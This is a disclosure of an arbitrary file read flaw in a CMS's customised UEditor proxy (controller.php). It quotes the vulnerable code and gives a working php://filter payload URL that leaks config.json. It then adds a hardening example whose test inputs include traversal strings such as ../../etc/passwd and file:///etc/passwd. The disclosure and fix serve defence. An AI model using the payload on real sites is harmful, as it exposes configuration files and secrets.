This CMS uses UEditor, a rich text editor developed by Baidu (Top 100 Global Enterprises). After the CMS author's secondary development of it, an arbitrary file read vulnerability was introduced. Details are as follows.
In the file /static/ueditor/php/controller.php, the author added a proxy function which causes a path traversal problem and can read any file on the system where the CMS is installed.
controller.php:
if(strlen($data) > 100){
    header("Content-type: image/jpeg");
    if($maxwidth > 0){
        $image = imagecreatefromstring($data);
        if($image){
            $width = imagesx($image);
            $height = imagesy($image);
            $sw=0;
            if($width > $height){
                if($width > $maxwidth){
                    $sw = $maxwidth;
                    $sh = $height * $sw / $width;
                }
            }else{
                if($height > $maxwidth){
                    $sh = $maxwidth;
                    $sw = $width * $sh / $height;
                }
            }
            if($sw > 0){
                $newimage = imagecreatetruecolor($sw,$sh);
                imagecopyresampled($newimage, $image, 0, 0, 0, 0, $sw, $sh, $width, $height);
                imagejpeg($newimage,null,70);
                imagedestroy($newimage);
            }else{
                imagejpeg($image,null,70);
            }
            imagedestroy($image);
        }
    }else{
        // maxwidth <= 0: $data is echoed back unmodified, with no image check
        echo $data;
    }
}
Payload:
http://localhost/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=config.json&maxwidth=-1&referer=test
After base64-decoding the response several times, you can see the real content.
If the author sees this message, I hope you fix the vulnerability as soon as possible.
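One way to harden the proxy, shown as an added example that is not the CMS's or UEditor's own code: validate `remote` before anything is fetched, and only return data that decodes as an image. It assumes the proxy reads `remote` with a stream-wrapper-aware function; `ALLOWED_HOSTS`, `is_safe_remote()` and `is_image_payload()` are hypothetical names, and the host list and sample inputs are constructed.

```php
<?php
// Added example, not code from the CMS. All names here are hypothetical.
const ALLOWED_HOSTS = ['img.example.com']; // constructed sample allowlist

function is_safe_remote(string $remote): bool
{
    // Requiring an explicit http/https scheme and a host rejects stream
    // wrappers (php://, file://, data://, phar://) and bare local paths.
    $parts = parse_url($remote);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Only fetch from hosts the site actually needs to proxy.
    return in_array(strtolower($parts['host']), ALLOWED_HOSTS, true);
}

function is_image_payload(string $data): bool
{
    // The controller's else branch echoes $data as-is; check that the bytes
    // really are an image before sending them under an image content type.
    return @getimagesizefromstring($data) !== false;
}

// Constructed sample inputs, including the request shape shown above.
$samples = [
    'php://filter/convert.base64-encode/resource=config.json',
    'config.json',
    '../../etc/passwd',
    'file:///etc/passwd',
    'http://img.example.com/a.jpg',
    'https://other.example.net/a.jpg',
];
foreach ($samples as $s) {
    printf("%-58s %s\n", $s, is_safe_remote($s) ? 'allow' : 'reject');
}

// A base64-encoded config file is not an image, so it would not be returned.
$fake = base64_encode('{"db_password":"constructed-sample"}');
printf("image check on encoded text: %s\n", is_image_payload($fake) ? 'pass' : 'fail');
```

In the controller, both checks would run before the `header("Content-type: image/jpeg")` line, with a 400 response on failure.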